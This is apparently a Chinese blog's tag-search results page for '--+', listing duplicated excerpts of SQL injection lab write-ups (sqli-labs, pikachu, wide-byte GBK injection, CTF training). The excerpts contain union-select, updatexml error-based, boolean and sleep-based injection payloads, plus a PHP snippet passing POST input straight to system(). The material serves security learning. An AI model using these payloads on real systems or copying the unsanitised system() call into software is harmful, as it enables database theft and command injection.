搜索结果
查询Tags标签: --+,共有 57条记录-
sql注入记录
order by确定列数 id = 1 order by 5 --+union确定匹配的列 id=0 union select 1,2,3 --+获取相应的用户名和数据库名 id=0 union select 1,user(),database() --+group_contact()函数GROUP_CONCAT(expr)该函数将非空列值按照分组条件进行合并并最终返回。如果有空值,则返…
2021/12/14 2:17:40 人评论 次浏览 -
sql注入记录
order by确定列数 id = 1 order by 5 --+union确定匹配的列 id=0 union select 1,2,3 --+获取相应的用户名和数据库名 id=0 union select 1,user(),database() --+group_contact()函数GROUP_CONCAT(expr)该函数将非空列值按照分组条件进行合并并最终返回。如果有空值,则返…
2021/12/14 2:17:40 人评论 次浏览 -
MySQL 宽字节注入
MySQL 宽字节注入 1.宽字节诸如基础 GBK占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码,MySQL默认字符集是GBK等宽字节字符集。 %DF:会被PHP当中的addslashes函数转义为"%DF","“既URL里的“%5C”,那也就是说,“%DF”会被转成…
2021/12/11 19:49:34 人评论 次浏览 -
MySQL 宽字节注入
MySQL 宽字节注入 1.宽字节诸如基础 GBK占用两字节 ASCII占用一字节 PHP中编码为GBK,函数执行添加的是ASCII编码,MySQL默认字符集是GBK等宽字节字符集。 %DF:会被PHP当中的addslashes函数转义为"%DF","“既URL里的“%5C”,那也就是说,“%DF”会被转成…
2021/12/11 19:49:34 人评论 次浏览 -
2021/12/7 WEB基础培训
培训 WEB (略微提升) 1.exec BUU <?php if (isset($_POST[target])) {system("ping -c 3 ".$_POST[target]); } ?>2.SQL注入 BUU ?id=1 order by 3--+ ?id=-1 union select 1,database(),3--+ ?id=-1 union select 1,group_concat(table_name),3…
2021/12/7 6:17:04 人评论 次浏览 -
2021/12/7 WEB基础培训
培训 WEB (略微提升) 1.exec BUU <?php if (isset($_POST[target])) {system("ping -c 3 ".$_POST[target]); } ?>2.SQL注入 BUU ?id=1 order by 3--+ ?id=-1 union select 1,database(),3--+ ?id=-1 union select 1,group_concat(table_name),3…
2021/12/7 6:17:04 人评论 次浏览 -
pikachu学习——sql注入部分
数字型注入用burpsuite进行抓包发现变量为id,因为是字符型所以构造payload为发现并没有报错,说明有两个字段 之后要获取显示位,使用union select 1,2去实验发现1和2都回显了 在1或者2上面构造payload 按照下面的步骤来进行注入: 获取数据库: union select 1,group_co…
2021/12/5 2:17:05 人评论 次浏览 -
pikachu学习——sql注入部分
数字型注入用burpsuite进行抓包发现变量为id,因为是字符型所以构造payload为发现并没有报错,说明有两个字段 之后要获取显示位,使用union select 1,2去实验发现1和2都回显了 在1或者2上面构造payload 按照下面的步骤来进行注入: 获取数据库: union select 1,group_co…
2021/12/5 2:17:05 人评论 次浏览 -
Sqlilabs超详细通过教程(持续更新)
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ and1=2--+ "and1=2--+ )and1=2--+ )and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的…
2021/11/3 2:09:42 人评论 次浏览 -
Sqlilabs超详细通过教程(持续更新)
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ and1=2--+ "and1=2--+ )and1=2--+ )and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的…
2021/11/3 2:09:42 人评论 次浏览 -
sqli-labs less-1
id=1 id=2,前后两者不同,存在联合查询 id=2,存在报错注入id=2 --+ (闭合掉前面的单引号,--+注释掉后面的内容) id=2 and 1=1 --+ id=2 and 1=2 --+ 存在布尔类型注入 id=2 and sleep(5) --+,有等待时间。所以存在延时注入
2021/10/19 19:14:46 人评论 次浏览 -
sqli-labs less-1
id=1 id=2,前后两者不同,存在联合查询 id=2,存在报错注入id=2 --+ (闭合掉前面的单引号,--+注释掉后面的内容) id=2 and 1=1 --+ id=2 and 1=2 --+ 存在布尔类型注入 id=2 and sleep(5) --+,有等待时间。所以存在延时注入
2021/10/19 19:14:46 人评论 次浏览 -
SQL注入详解 32-37关
Less-32(宽字节注入——union联合)第32关总结: 32关对输入进的单引号及双引号进行了反斜杠转义,我们需要进行宽字节注入,宽字节注入的原理:数据库编码必须是utf-8,gbkb等,不能为ascii编码,\编码为%5c,使用%df与%5c进行拼接,形成%df%5c(一个汉字),变成了一个…
2021/10/14 19:44:59 人评论 次浏览 -
SQL注入详解 32-37关
Less-32(宽字节注入——union联合)第32关总结: 32关对输入进的单引号及双引号进行了反斜杠转义,我们需要进行宽字节注入,宽字节注入的原理:数据库编码必须是utf-8,gbkb等,不能为ascii编码,\编码为%5c,使用%df与%5c进行拼接,形成%df%5c(一个汉字),变成了一个…
2021/10/14 19:44:59 人评论 次浏览 -
Sqli labs less 60
1.常规方法测试 2.根据错误信息判断闭合方式为")–+,并且为字符型注入 3.查看当前库 ?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 4.查看库下的所有表88IVGFZVAY ?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_…
2021/9/26 19:11:22 人评论 次浏览
